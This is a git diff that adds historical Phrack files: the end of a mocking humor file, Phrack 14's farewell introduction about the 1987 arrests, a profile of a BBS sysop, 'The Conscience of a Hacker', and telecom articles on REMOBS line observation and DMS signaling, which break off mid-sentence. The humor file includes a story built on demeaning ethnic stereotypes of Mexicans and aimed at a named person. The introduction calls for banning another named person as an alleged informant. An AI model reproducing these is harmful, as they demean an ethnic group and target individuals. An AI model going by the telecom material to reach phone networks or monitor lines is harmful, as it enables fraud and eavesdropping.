+     6. ALWAYS list things vertically, it makes you look
+        professional. (And it takes up space too)
+     7. ALWAYS thank 10 famous people even if they didn't
+        help you on the file because it will make it seem
+        as if you know them REAL well.
+     8. ALWAYS interject your own opinions because it makes
+        you look scholarly and that you are a master of the
+        facts you are perpetrating.
+     9. ALWAYS make at least 5 spelling mistakes, because it
+        makes it seem as if you did it in a hurry because
+        you have a social life, even when you don't and
+        spent days on it correcting spelling and grammar.
+    10. ALWAYS type stuff like jkwhebfiue in parts you don't
+        fully understand and then blame it on the xmission.
+        This releases you from knowing everything in the
+        file.
+    11. ALWAYS dedicate your file to a girlfriend, it makes
+        you look like you have one and that you are a stud,
+        even if you look like Slave Driver.
+
+Sexy-Exy presents...
+
+A Humor Filled Article
+
+                     A Marvelous Laugh For The 80's
+                        A Nice Bedtime Story
+                     A Stephen King Look-a-Like
+                          A Joke for You!
+            "When a Phreak/Hacker says...He really means,,,"
+
+Preface
+=======
+Just a note, all names mentioned are fictitous, and are
+creations of the author. Any resemblences or factual
+similiarity are completely coincidental.
+When a Phone Phreak or Hacker says something, there is
+usually an undertone or subliminal message, in this nice
+file, I will list some of the more common ones you will run
+across.
+1. When Slave Driver says
+     'I am on the football team!'
+   He really means...
+     'I wash the uniforms for the guys.
+2. When Carrier Culprit says...
+     'I look like Don Johnson!'
+   He really means...
+     He watches too much 'Miami Vice'.
+3. When Knight Lightning says...
+     'Hi this is KL, I wanna ask you something...'
+   He really means...
+     'Hi, this is KL, let me open up my Database.'
+4. When Phantom Phreaker says...
+     'I go trashing for all my information.'
+   He really means...
+     'I am going to shop for Christmas dinner.'
+5. When Dr. Doom says...
+     'I got locked out of my house.'
+   He really means...
+     'The Dept. of Sanitation put the lid back on the sewer'
+5. When Forest Ranger says...
+     'I am tenderizing meat.'
+   He really means...
+     'I am popping my zits.'
+6. When Line Breaker says...
+     ANYTHING
+   He really means...
+     'I am lying to cover my stupidity.'
+7. When Silver Spy says...
+     'I am God at the VAX/VMS.
+   He really means...
+     'I work with a VAX, so I am not that impressive.'
+8. When Evil Jay says...
+     'I am into Heavy Metal.'
+   He really means...
+     'I have no friends and bang my head in frustration.'
+9. When The Rocker says...
+     'I love to party.'
+   He really means...
+     He watches Animal House and thinks he can party.
+10. When Mark Tabas says...
+     'I have an athletic family.'
+    He really means...
+     'Me and my little girlfriend are running
+         away from EVERYBODY.
+11. When Captain Hooke (Howie) says...
+     'Hey man, I am gonna fuck up your dad's credit card on
+      TRW!'
+    He really means...
+     'I spend too much time talking to Line Breaker.'
+12. When Captain Hooke (Howie) says...
+     'I have a major social life.'
+    He really means...
+     'I call up the conference bridges and spend all of
+      my time talking to losers.'
+13. When Dr. Who says...
+     'I have done alot for the Phreak/Hack world.'
+    He really means...
+     'I try everything first to see if it's safe.'
+14. When Forest Ranger says...
+     'Telecomputist will be an original magazine full of
+      new information.
+    He really means...
+     'Telecomputist is written on toilet paper with
+      the same quality and originality of articles'
+16. When Attila the Hun says...
+     'I love to Slam Dance!'
+    He really means...
+     'When he's in a ballroom he steps on EVERYONE'S feet.'
+17. When Ax Murderer says...
+     'Yo, I just wrote the most complete file on UNIX with
+      examples.'
+     He really means...
+     'I rewrote a Unix manual and copied the illustrations
+      too.'
+18. When Taran King says...
+     'Yo, MSP is down due to Hard disk problems.'
+    He really means...
+     'I spilled dinner over the computer chatting with KL.'
+19. When Sinister Fog says...
+     'I used to run the best bbs in the country.'
+    He really means...
+     'We tried to find the non-existant alogarithm for SPC.'
+20. When Oryan Quest says...
+     'I am gonna bill $20000 to you Taran!'
+    He really means...
+     'PLEASE let me back on Metal Shop!'
+21. When The Executioner says...
+     'Yes, Taran I will have your file in time for Phrack.'
+    He really means...
+     'I fucked up again and I'll have to get Bill to help me
+      out.'
+22.  When Bill From RNOC says...
+      'Hey, what's up?'
+     He really means...
+      'I'm here to leach all your new stuff, pull your tolls
+        and stab you in the back.'
+=============================================================
+ORYAN QUEST - A point by point historical recreation of this
+              controversial excuse for recycled shit from
+              the sewer of Mexico.
+     "Juan!!!", screamed the mexican lady, "get over here,
+mucho expresso!"
+     "Coming my little tortilla!!", panted the tired Mexican peasant.
+     "What is it my little bag of cabbage leaves?", inquired
+the Hispanic mongrel.
+     "Juan, Juan, Juan, I tink I am stricken with baby!"
+exclaimed his wife.
+     "OH NO! my babaloo!, not another little child," cried
+Juan, "We cannot afford to have another child."
+     "My wages picking coffee beans and stripping cabbage
+barely feed our other 12 children, how am I going to support
+THIS bastard billy-goat?", asked Juan.
+      Well, the day finally came, and the poverty stricken
+couple made their way to the village hospital, by way of
+mule, a mercedes to the couple.
+     "Oooooooooh....", cried the lady in pain, as the baby
+pushed it's way forward.
+     "Ohhh what a beautiful child", exclaimed Juan.
+     "Uh senor, that's the pre-natal discharge, your baby is
+next.", corrected the doctor.
+     The baby's body began to appear(feet first, of course),
+it's WIDE vertical smile, greeting the world.
+     "Oh my,",said Juan,"he looks just like his papa!"
+     "I must give him a proper name.", continued Juan.
+     "I name you..
+     Senor Pepe Guadaloop Tom Flanagan Paco Oryan QUESTO!"
+
+     [Pretend there is alot of applause]
+
+     Well, Paco, I mean QUEST, learned the trade of his
+father and his father's father.  Toiling and slaving away, he
+dreamed of one day going to America, north of the border,
+and leading a life of a re-fried bean.
+     One lazy sunny day, Paco and his father were doing
+their daily fishing, trying to make a living for themselves
+and feed their family,with out eating stray dogs. Questo was
+casting off with his new hardwood fishing pole that his
+father made for him that very morning. Juan was picking his
+nose and batting an eye at his son, marveling his skill at
+throwing the line.
+     Suddenly Paco's line went taut with a quick jerk and
+Paco's limp 100 lb body flew into the water with a splash.
+     "Oh no, my little chili bean fart, what should I do.
+Juan pulled Quest out of the water. Well, he thought "At
+least he's clean now, I don't think he'll be thirsty for at
+least another week.
+
+[Sorry to end this story so abruptly, but Oryan Quest is
+not worth more than 5K, come to think of it he's not worth a
+byte. I figgured since he tried SOOOO hard to write a rag
+file about me (See Phrack 12) that I ought to show exactly
+what the word, "rag" means.
diff --git a/phrack14/1.txt b/phrack14/1.txt
new file mode 100644
index 0000000..67d839a
--- /dev/null
+++ b/phrack14/1.txt
@@ -0,0 +1,50 @@
+                               ==Phrack Inc.==
+
+                            Issue XIV, File 1 of 9
+
+                          Released On July 28, 1987
+
+Hi and welcome to the final regular issue of Phrack Newsletter.  Most of you
+already know about the nationwide arrest of many of the phreak/hack world's
+most knowledgeable members.  I may receive a visit from the authorities as
+well and because of this and other events, I am going to leave the modem
+world.
+
+As of now, Phrack Inc. is dissolved.  It may put out an annual publication
+once a year in the summer, but this is only a possibility.  If I remain a free
+person, I will be able to release Phrack XV which will only be news and it
+will feature details about Dan The Operator, PartyCon '87, and, of course, the
+current Secret Service bust wave.
+
+One last thing to mention.  Although I don't have the time to go into full
+detail about it right now, at the current time, we at Phrack Inc. have
+uncovered a large amount of evidence to support the conclusion that MAD HATTER
+is an informant.  He should be deleted off of any BBSes that he calls.  We
+believe that he was planted by the Secret Service to infiltrate PartyCon '87
+and frame Control C and many others.
+
+One last statement to make before the directory.  Basically, I have wanted my
+escape from the phreak/hack world for a long time.  I figured SummerCon '87
+would be my last big thing and then I'd write the article for PWN and by July
+1, 1987, I would be done and out of the modem community.  Unfortunately,
+events just kept happening and are still in motion.  Even if I am not busted,
+as of August 1, 1987, I am considering myself not a member of the modem
+community and I will not appear anywhere.  If Phrack XV isn't out by then, you
+won't see it ever.  I'm sorry, but that's the way it has to be.
+
+This issue features:
+
+Introduction by Knight Lightning . . . . . . . . . . . . . ..012 Apple Sectors
+Phrack Pro-Phile X Featuring Terminus by Taran King. . . . ..030 Apple Sectors
+The Conscience of a Hacker {Reprint} by The Mentor . . . . ..017 Apple Sectors
+The Reality of The Myth [REMOBS] by Taran King . . . . . . ..026 Apple Sectors
+Understanding DMS Part II by Control C . . . . . . . . . . ..071 Apple Sectors
+TRW Business Terminology by Control C. . . . . . . . . . . ..021 Apple Sectors
+Phrack World News Special Edition #1 by Knight Lightning . ..053 Apple Sectors
+Phrack World News Issue XIV/1 by Knight Lightning. . . . . ..070 Apple Sectors
+Phrack World News Issue XIV/2 by Knight Lightning. . . . . ..101 Apple Sectors
+
+I hope you enjoy it.
+
+:Knight Lightning
+______________________________________________________________________________
diff --git a/phrack14/2.txt b/phrack14/2.txt
new file mode 100644
index 0000000..97a36a8
--- /dev/null
+++ b/phrack14/2.txt
@@ -0,0 +1,142 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 14, Phile #2 of 9
+
+                            ==Phrack Pro-Phile X==
+
+                      Written and Created by Taran King
+
+                                   5/24/87
+
+         Welcome to Phrack Pro-Phile X.  Phrack Pro-Phile is created to bring
+info to you, the users, about old or highly important/controversial people.
+This month, we bring to you a sysop and user of past days...
+
+                                   Terminus
+                                   ~~~~~~~~
+
+         Terminus is the sysop of NetSys Unix and, in the past, ran Metronet.
+------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle:  Terminus
+           Call him:  Len
+       Past handles:  Terminal Technician
+      Handle origin:  Terminal Technician originated because of Len's view of
+                      himself as a hacker.  Terminus was an offshoot of that
+                      and, although it is an egotistical view, it means he has
+                      reached the final point of being a proficient hacker.
+      Date of Birth:  1/10/59
+Age at current date:  29 years old
+             Height:  5'9"
+             Weight:  About 190 lbs.
+          Eye color:  Hazel
+         Hair Color:  Brown
+          Computers:  6800 home brew system, Apple ][, Altair S100, 2 Apple
+                      ][+es, IBM PC, IBM XT, IBM 3270, IBM AT, and 2 Altos
+                      986es.
+  Sysop/Co-Sysop of:  MetroNet, MegaNet, and NetSys Unix.
+
+------------------------------------------------------------------------------
+         Terminus began with the 6800 home brew system which he built himself.
+It was built on a STD44 bus and it had 8K of memory.  He then got the Apple ][
+(plain old ][) which was impressive with its cassette drive and RF modulator.
+He then got an Altair S100 which he liked because it looked like a mainframe
+and he also enjoyed building it.  The 2 ][+es came along and he got himself a
+few floppies and a hard drive.  He then sold 2 of the Apples and gave away all
+his software (and kept 1 Apple with a 15 meg hard drive) and got the IBM PC.
+He was impressed at the time and ditched the Apple.  Due to frustration from
+switching from an Apple Cat to a Hayes, he sat down and wrote a hacker which
+eventually turned into CodeBuster, which was, for a long time, the only good
+hacker available on IBM.  He then expanded and got an XT and slowly increased
+his amount of storage.  When the AT came out, he got rid of the PC and got the
+AT and at the same time, bought the IBM 3270.  After playing around with the
+AT for a long time, he sold it because he needed some money so he was left
+with the XT and 3270.  The XT was sold to make money to buy the Altos 986 and
+he sold the 3270 about 4 months ago, now leaving him with the 2 Altos 986es.
+
+         Terminus started running a bulletin board with an unmentionable board
+to start with in 914 (where he met Paul Muad'Dib), and eventually got MetroNet
+going.  MetroNet's original purpose was to be a phreak/hack board.  It was run
+on an Apple ][ with 4 8" drives and 2 floppies plus a 5 meg hard drive, which
+made for an impressive system.  It was going really well for a while, but then
+the hard drive crashed, leaving the board down for about a month and things
+slowed down after that.  At that time, he got a 15 meg drive, and a 1200
+modem soon followed and it stayed up for about a year and a half total, at
+which time Lord Digital was co-sysop.  It finally went down because he moved.
+MegaNet was his next system, which ran under Concurrent PC-DOS.  It looked
+like a public domain system, but that was camouflage.  It was multi-user (2
+phone lines) and it ran on the XT.  That went down because he moved again
+after being up for over a year.  He is currently running NetSys Unix on his 2
+Altos 986es which are networked.  The system consists of 2 Altos 986es, an
+Ethernet link, 240 megs, and 4 phone lines on a hunt, 3 of which are 1200 baud
+and the final line is 2400 baud.  To get on NetSys, it is just $5 a month and
+it can be reached at 301-540-3659 (2400 baud), and 3658-3656 (300/1200 baud).
+
+         Terminus has never really met anyone in person from the phreak/hack
+community, although he had many chances to in New York when he lived there.
+He did go to a couple of Tap meetings, but doesn't remember anyone in specific
+from when he went.
+
+         Len started phreaking and hacking through a friend who worked in the
+phone company that told him about various things that could be done with
+electronics to play with the network.  He was very paranoid about boxing so he
+never did anything like that (from his house anyway).  He started hacking
+naturally after he got a computer.  His favorite system was the University of
+Illinois because of its huge size and capabilities.
+
+         Some of the memorable phreak boards he was on included Plovernet,
+L.O.D., Pirate 80, OSUNY, Sherwood Forest I, and Shadowland.
+
+         Terminus is an electrical engineer and he designs boards for
+different minicomputers like PDP-11s, Data Generals, VAXes, and Perkin-Elmer.
+He also writes some software to interface the boards that he makes.  He's
+pretty decent at machine language, but recently (maybe because of the Unix?
+Maybe?) he's gotten into C.
+
+------------------------------------------------------------------------------
+
+        Interests:  Telecommunications (modeming, phreaking, hacking), music,
+                    and smoking (ahem).
+
+Terminus's Favorite Things
+--------------------------
+
+     Smoking:  Let's leave it at that.
+       Music:  Hard rock and progressive jazz (he used to be a drummer).
+ Programming:  Writing software for fun.
+
+Most Memorable Experiences
+--------------------------
+
+Getting interviewed by the FBI in 1983 due to someone in Iowa getting busted.
+The first time he discovered Alliance Teleconferencing and ran a conference.
+
+Some People to Mention
+----------------------
+
+Krackowicz (Just a big "Thanks.")
+The (414) Gizard (Sysop of Cryton Elite, thanks for giving him the phone
+                  numbers and names to everyone on your system.)
+Lord Digital (For being a good friend [Where the hell are you?].)
+
+------------------------------------------------------------------------------
+
+         Terminus shares Tuc's views on carding and feels it's a big gap
+between committing fraud and learning the network.  As he got older, he got
+more paranoid about things like that.  He also feels that the phreak/hack
+"community" has already crumbled.  He also feels that the old days were
+better.
+
+------------------------------------------------------------------------------
+
+I hope you enjoyed this file, ...And now for the regularly taken poll from all
+interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  No, none of the people that he hung
+out with.  Thank you for your time, Len.
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
+______________________________________________________________________________
diff --git a/phrack14/3.txt b/phrack14/3.txt
new file mode 100644
index 0000000..d60bf36
--- /dev/null
+++ b/phrack14/3.txt
@@ -0,0 +1,79 @@
+                               ==Phrack Inc.==
+
+                            Issue XIV, File 3 of 9
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+The following file is being reprinted in honor and sympathy for the many
+phreaks and hackers that have been busted recently by the Secret Service. -KL
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                       \/\The Conscience of a Hacker/\/
+
+                                      by
+
+                               +++The Mentor+++
+
+                          Written on January 8, 1986
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+        Another one got caught today, it's all over the papers.  "Teenager
+Arrested in Computer Crime Scandal," "Hacker Arrested after Bank Tampering"...
+        Damn kids.  They're all alike.
+
+        But did you, in your three-piece psychology and 1950's technobrain,
+ever take a look behind the eyes of the hacker?  Did you ever wonder what
+made him tick, what forces shaped him, what may have molded him?
+        I am a hacker, enter my world...
+        Mine is a world that begins with school... I'm smarter than most of
+the other kids, this crap they teach us bores me...
+        Damn underachievers.  They're all alike.
+
+        I'm in junior high or high school.  I've listened to teachers explain
+for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
+Smith, I didn't show my work.  I did it in my head..."
+        Damn kid.  Probably copied it.  They're all alike.
+
+        I made a discovery today.  I found a computer.  Wait a second, this is
+cool.  It does what I want it to.  If it makes a mistake, it's because I
+screwed it up.  Not because it doesn't like me...
+                Or feels threatened by me...
+                Or thinks I'm a smart ass...
+                Or doesn't like teaching and shouldn't be here...
+        Damn kid.  All he does is play games.  They're all alike.
+
+        And then it happened... a door opened to a world... rushing through
+the phone line like heroin through an addict's veins, an electronic pulse is
+sent out, a refuge from the day-to-day incompetencies is sought... a board is
+found.
+        "This is it... this is where I belong..."
+        I know everyone here... even if I've never met them, never talked to
+them, may never hear from them again... I know you all...
+        Damn kid.  Tying up the phone line again.  They're all alike...
+
+        You bet your ass we're all alike... we've been spoon-fed baby food at
+school when we hungered for steak... the bits of meat that you did let slip
+through were pre-chewed and tasteless.  We've been dominated by sadists, or
+ignored by the apathetic.  The few that had something to teach found us will-
+ing pupils, but those few are like drops of water in the desert.
+
+        This is our world now... the world of the electron and the switch, the
+beauty of the baud.  We make use of a service already existing without paying
+for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
+you call us criminals.  We explore... and you call us criminals.  We seek
+after knowledge... and you call us criminals.  We exist without skin color,
+without nationality, without religious bias... and you call us criminals.
+You build atomic bombs, you wage wars, you murder, cheat, and lie to us
+and try to make us believe it's for our own good, yet we're the criminals.
+
+        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
+that of judging people by what they say and think, not what they look like.
+My crime is that of outsmarting you, something that you will never forgive me
+for.
+
+        I am a hacker, and this is my manifesto.  You may stop this
+individual, but you can't stop us all... after all, we're all alike.
+
+                               +++The Mentor+++
+
+     [May the members of the phreak community never forget his words -KL]
+______________________________________________________________________________
diff --git a/phrack14/4.txt b/phrack14/4.txt
new file mode 100644
index 0000000..f0933d1
--- /dev/null
+++ b/phrack14/4.txt
@@ -0,0 +1,104 @@
+                               ==Phrack Inc.==
+
+                            Issue XIV, File 4 of 9
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                           The Reality of the Myth
+
+                                    REMOBS
+
+                                by Taran King
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+         In the  past, many  misconceptions  have  been  made of the legendary
+REMOBS system.  The term has  been used and abused.  It  used to  be known  as
+REMOB, rather than the proper REMOBS, which stood for Remote Observation.  The
+REMOBS is a  REMote service  OBservation  System  manufactured  by  Teltone, a
+company which makes various telephone equipment peripherals.
+
+         REMOBS has a  number of  features.  The REMOBS  permits evaluation of
+equipment or employee performance.  It allows observation of subscriber lines,
+CO, toll, and E&M  trunks, repair  bureaus, and operator positions.  It can be
+portable or set up  as dedicated  remote terminals.  The  observer console can
+sample  entire networks.  REMOBS is compatible with all types of switching and
+transmission media.
+
+         The  purpose  of  the  REMOBS  system  is to measure  performance and
+service  provided to  customers  in  an  impartial  and  unbiased  manner.  By
+monitoring the subscriber connections  throughout the network switch, this can
+be achieved.  The customer experiences are recorded and statistics are derived
+to provide service level indices.
+
+         REMOBS is  compatible with  all switching  systems including  Step by
+Step, Crossbar, and electronic  equipment.  In each  situation, it can observe
+almost   any   transmission   point  such  as  subscriber   lines, inter-  and
+intra-office  trunks, toll  trunks, E&M  trunks,  repair  bureaus,  commercial
+offices, and  operator positions.  The  console operators can observe by phone
+line,  from  one  location,  any  switch  location/CO  with  the  remote  unit
+installed.
+
+         The  M-241 system  (which includes  the console and  remote terminal)
+observes up  to 40  circuits, but  can scan  up to  100 lines  with  a  remote
+terminal.  The terminal may observe up to  5  locations simultaneously, with a
+capacity to observe 500 circuits at any one time.
+
+         The REMOBS system  can observe all  remote terminals at any switching
+system location through the console controls, making it feasible to observe an
+entire network.  Remote terminals are equipped with plug-in connectors so they
+can be moved routinely to observe desired locations.
+
+The M-241 Remote Terminal:  The  remote terminal  is located  at the  point of
+==========================  observation.  It  may  be  ordered in  portable or
+dedicated configuration.  The remote terminal  remains inactive until accessed
+by the  controlling  console.  The remote unit is  6.5" high, 22.88" wide, and
+11.7" deep, arranged for relay rack mounting.
+
+The M-242 Observer's Console:  Console  operators access  the remote terminals
+=============================  through telephone lines.  Access to the remotes
+is limited to  console operators who know the  access number, timing, and four
+digit security code.  Additional  security  is  available  with  the  optional
+security dialback feature.  The  System automatically scans observed circuits.
+The first circuit to become busy is  selected and held by the system until the
+necessary  information is  secured, the  operator presses the reset button, or
+the calling  party goes on-hook.  Timing  circuits automatically drop the call
+100 seconds after the calling party goes off-hook or, if answer supervision is
+present, 15  seconds after the called party answers.  The console itself looks
+very  much like  a  cash register.  Where  the digits  are normally, there are
+places for  the trunk identity,  called  number,  stop clock, and memory.  The
+pushbutton  controls  consist  of  the  following:  power  (key switch),  hold
+buttons,  select buttons,  calling party,  called party,  display hold, clear,
+O.G. line, auto  reset, reset (manual), read (stop clock operate), talk, voice
+exclusion, memory,  plus a standard  touch-tone keypad with the A, B, C, and D
+keys.  There  are  2  monitor  jacks, a  volume control and, for the primitive
+lines  and  switches, a  rotary  dial  next  to  the  touch-tone  keypad.  The
+operator's  console  stands  2.25"  in the front and  8.25"  in the back; it's
+17,25" wide and 16.5" deep.
+
+         The  observation  system  network is set up in the  following manner.
+The operator observer is in an  observing center at the local  Central  Office
+with the  M-242  REMOBS  Central  Console (which looks like a telephone to the
+Central  Office).  Through  the  standard  telephone  network,  communications
+occurs  between the console and the remote.  From the CO, through the incoming
+circuitry, it goes  through the  connector to the M-241 REMOBS Remote Terminal
+(which looks like a telephone to the  access line).  From there the connection
+is  made to  the circuits  to be  observed including  the  subscribers  lines,
+line-finders, toll trunks, repair lines, etc.
+
+         The  information provided  is both  visual and  audible.  The  visual
+display, showed on the  panel, includes the identity of  the remote  terminal,
+the identity of the  observed  circuit, the  signalled  digits (up to 52), the
+status of the calling and called  parties (on/off-hook), and the timing of the
+call.  The audible  information (which is provided through headset or handset)
+includes  the  call  progress  tones  for  disposition  (dial  tone,  type  of
+signalling,  60 IPM,  120 IPM,  ringing,  answer, etc.) and voice transmission
+(calling and called parties).
+
+         The  REMOBS  system is  very much  different from  often-misconceived
+system known as 4Tel made by Teredyne.  REMOBS is very much different from the
+dial-up - enter 1 code - be given instructions simplicity of the  4Tel  but it
+still has the legendary capabilities of listening in remotely.
+
+         If you wish to gain more information about the REMOBS system, Teltone
+Corporation can be written to at 10801 - 120th Avenue N.E., Kirkland, WA 98033
+or phoned at (206) 827-9626.
+______________________________________________________________________________
diff --git a/phrack14/5.txt b/phrack14/5.txt
new file mode 100644
index 0000000..3148744
--- /dev/null
+++ b/phrack14/5.txt
@@ -0,0 +1,376 @@
+                               ==Phrack Inc.==
+
+                            Issue XIV, File 5 of 9
+ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
+|_|                                                                       |_|
+|_|              Understanding the Digital Multiplexing System            |_|
+|_|                                 Part II                               |_|
+|_|                                                                       |_|
+|_|                              by Control C                             |_|
+|_|                                                                       |_|
+|_|             An Advanced Telecommunications, Inc. Production           |_|
+|_|_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|_|
+|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
+
+
+
+DMS switches were first introduced in 1979.  Since then it has been modified
+to interface with numerous types of switches.  DMS has the ability to
+interface with SP-1, #5 XBar, 1ESS, 2ESS, 3ESS, 4ESS, NX1D, NX1E, TSD, SXS,
+ETS4, NO. 1 EAC, NO. 2 EAX, NO. 3 EAX, TSPS, CAMA/3CL boards, Stromberg
+Carlson Turret of ONI and Visual Indicators, Modified North Electric TSD for
+ONI, Stomberg Carlson (CAMA operator Position - ONI/ANI), AE #31 Switchboard,
+Co-located NT/AE switchboard I/C, O/G, UDC data poller of OM, DACS (Directory
+Assistance Charging System), NT #144 LTD, WECO #14 LTD, WECO #16 LTD, CALRS
+(Centralized Automated Loop Reporting System), Badger 612A, AE #1 and #21 LTD,
+AE #30, SC #14 LTD, Lordel MITS70 line Test System, Porta System Line Test
+Unit, Pulsar II IMTS, Teradyne loop test unit, and the WECO MLT 1 (Mechanized
+Loop Testing System).
+
+
+Common Channel Interoffice Signaling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Common Channel Interoffice Signaling (CCIS) is a way of signaling and a way of
+implementing network level services.  CCIS provides reliable, crystal clear
+data signaling links between the network and the switching offices.  The CCIS
+signaling method uses transmission equipment that is separate from voice
+trunks.
+
+
+Common Channel Interoffice Signaling No. 6
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The basis for the CCIS system is the International Consultative Committee on
+Telephone and Telegraph (CCITT) No. 6 international standard, which is brought
+to its fullest capacity for use in the Stored Program Control (SPC) network of
+AT&T.
+
+The CCIS6 network contains a bunch of signaling regions, each having a pair of
+interconnected Signal Transfer Points (STP).  The switching systems put into
+CCIS6 that connect to STPs are called Serving Offices (SO).
+
+Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type trunks
+using the CCIS network.
+
+Direct Signaling (CCIS-DS) is used for signaling between SPC switching
+machines and a Network Control Point (NCP).  At the present time, CCIS6 can
+handle Enhanced INWATS Originating Screening Office (OSO), Calling Card
+Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number
+Screening (BNS).  CCIS6 is available with DMS-100/200, DMS-200, and
+DMS-100/200 or DMS-200 with TOPS.
+
+
+CCIS6 Diagram:
+                                            NSB        ST
+                      ------------         - - - - - - - - - - -
+          DTC        |            |      |            -------    |
+         - - -  DS30 |    IPML    | DS30 |  - - -    | ||    |   |
+--------|     |------|- - - - - - |------|-|     |---| ||    |   |
+Digital  - - -       |            |      |  - - -    | ||    |   |
+Trunks               |            |      |           | ||    |   |
+                     |            |      |            -------    |
+                     |            |        - - - - - - -|- - - -
+          DTC        |            |          TM         |
+  DIG    - - -  DS30 |    NUC     |  DS30   - - -      -----
+--------|     |------|- - - - - - |--------|     |----|     |
+^        - - -       |Network     |         - - -      -----
+CCIS         \        ------------                     Modem
+Signaling     \            |
+           - - -         -----
+AN Links--|     |       | CCC |
+           - - -         -----
+          Channel
+           Bank
+
+
+
+Acronyms:
+
+        DIG - Digital
+        AN - Analog
+        DTC - Digital Trunk Controller
+        MSB - Message Switch Buffer
+        ST - Signaling Terminal
+        TM - Trunk Module
+        NUC - Nailed-Up Connection
+        IPML - Inter-Peripheral Message Link
+
+
+Common Channel Interoffice Signaling No. 7
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system based on CCITT
+No. 7.  CCIS7/CCS7 on the DMS switch consists of two parts:  the Message
+Transfer Part (MTP) and the Interim Telephone user Part.  They are compatible
+with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS.
+
+CCIS7 can't tell the difference between banded and direct signaling.  CCIS7
+uses Destination/Origination Point Codes (DPC/OPC) to route back to the
+switch.
+
+CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS, Local
+Area Signaling Services, and Direct Service Dialing Capabilities.
+
+
+Equal Access
+~~~~~~~~~~~~
+The DMS-200 Access Tandem (AT) gives a traffic concentration and distribution
+function for interLATA traffic originating and a distribution function for
+interLATA traffic origination or terminating inside a Local Access and
+Transport Area (LATA).  This gives the interLATA Carrier (IC) access to more
+that one end office inside the LATA.  It can handle InterLATA Carrier access
+codes (10xxx), 10xxx and 950-yxxx dialing, Automatic Number Identification
+(ANI) on all calls, answer supervision, equal access Automatic Message
+Accounting (AMA) for both originating and terminating calls, and operator
+service signaling.
+
+The DMS-100 EA gives direct and tandem switched access service inside the LATA
+for originating and terminating to interLATA Carriers.  It is available in the
+following three ways:
+
+Equal Access End Office (EAEO)
+------------------------------
+DMS-100 Equal Access End Office (EAEO) gives a direct interconnection to
+interLATA Carriers' (IC) and international Carriers' (INC) Points of Presence
+(POP) inside the LATA.
+
+Access Tandem with Equal Access End Office
+------------------------------------------
+The DMS-200 Access Tandem (AT) when used with equal access end office (EAEO)
+lets trunk tandem interconnect to ICs/INCs POP inside the LATA.
+
+The connection of the Equal Access End Office (EAEO) to an IC/INC through the
+DMS-200 Access Tandem (AT) uses what is called two-stage overlap output
+pulsing which makes the time it takes to set up a call quicker.  The AT uses
+the digits OZZ + XXX out pulsed  in the first stage to identify the IC/INC
+dialed and to pick out outgoing trunk.  Then a connection is established from
+the IC/INC to the EAEO through the AT.  The second stage digits consist of ANI
+and the called numbers are passed through the DMS-200 AT at the IC/INC.
+
+An AMA terminating record in AT&T format is produced by the DMS-200 for all
+the EAEOs.  A per call terminating AMA record is made for calls that get to
+the stage where the trunk from the IC/INC has been seized and a "wink" has
+been returned by the DMS-200 AT.
+
+Access Tandem with a Non-Equal Access End Office
+------------------------------------------------
+DMS-200 AT using a non-equal access end office gives trunk tandem connection
+to an IC/INC POP within the LATA.  To set up a call, connection of Feature
+Group B (FGB) or Feature Group C (FGC) End Office to an IC/INC through the
+DMS-200 AT uses the standard Bell Central Automatic Message Accounting (CAMA)
+signaling.  The Access Tandem uses the XXX digits of the access code 950-YXXX
+out pulsed from the FGB end office to identify the IC/INC and to connect to an
+outgoing trunk.
+
+
+Mechanized Calling Card Service (MCCS)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The fraudulent use of calling cards, third number and collect calls and the
+increasing movement to automate current operator services has directly led to
+the implantation of the Mechanized Calling Card Service (MCCS) to DMS-200/TOPS
+and to the remote and host Operator Centralization (OC).
+
+MCCS uses CCIS to relay queries and responses to and from the DMS-200/TOPS.
+Operator handled calling card calls and the direct entry by subscribers of
+Calling Cards by DTMF (Touch-Tone) telephones are given special provisions by
+the MCCS.  Both the operator handling and the direct entry of calling card
+calls are decreasing the size of the operators.
+
+Billed Number Screening (BNS) gives an enhancement to the operator-handled
+collect and third-number billing by using CCIS to screen a number at the
+billing validation data base for billing restrictions (i.e. the third number
+is a fortress).  This feature naturally will reduce fraudulent use of the
+collect call feature.
+
+Common Channel Interoffice Signaling-Direct Signaling (CCIS-DS), which is
+the feature that the MCCS is designed around, is used to transmit messages to
